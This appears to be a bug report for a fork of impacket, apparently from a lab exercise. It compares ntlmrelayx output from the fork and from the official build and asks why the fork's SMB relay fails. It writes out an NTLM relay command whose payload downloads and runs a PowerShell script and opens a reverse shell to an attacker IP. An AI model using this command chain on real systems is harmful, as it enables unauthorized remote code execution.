Configuration
impacket version: v0.10.1.dev1+20230909.241.3001b26
Target OS: Linux kali 6.5.0-kali2-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.3-1kali2 (2023-10-03) x86_64 GNU/Linux
Using pipx
installation, thus it is in a fully isolated environment.
Context
Used to use this repository instead of the official impacket
repository because... it's just better. Anyway, that's not the point! So I wanted to do an NTLM relay by running a command on the target machine with:
ntlmrelayx.py --no-http-server -smb2support -t 192.168.240.212 -c 'powershell -nop -c "iex(irm http://192.168.45.242/winaries/Invoke-ConPtyShell.ps1); Invoke-ConPtyShell 192.168.45.242 443"'
Connected to another machine, I use the command dir \\192.168.45.242\t
to trigger the relay. And that's where things go wrong. Nothing happens:
Impacket for Exegol - v0.10.1.dev1+20230909.241.3001b26 - Copyright 2022 Fortra - forked by ThePorgs
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client RPC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-5 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-6 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-7 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-8 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-9 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-10 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-11 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-12 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-13 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-14 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-15 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
Whereas with impacket-ntlmrelayx
, it works and I have my shell:
$ impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.240.212 -c 'powershell -nop -c "iex(irm http://192.168.45.242/winaries/Invoke-ConPtyShell.ps1); Invoke-ConPtyShell 192.168.45.242 443"'
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client RPC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] Authenticating against smb://192.168.240.212 as FILES01/FILES02ADMIN SUCCEED
[*] SMBD-Thread-6 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
[*] SMBD-Thread-7 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
[*] SMBD-Thread-8 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
[*] Service RemoteRegistry is in stopped state
[*] SMBD-Thread-9 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
[*] SMBD-Thread-10 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
[*] Starting service RemoteRegistry
[*] SMBD-Thread-11 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
[*] SMBD-Thread-12 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
[*] SMBD-Thread-13 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
What could be the root cause?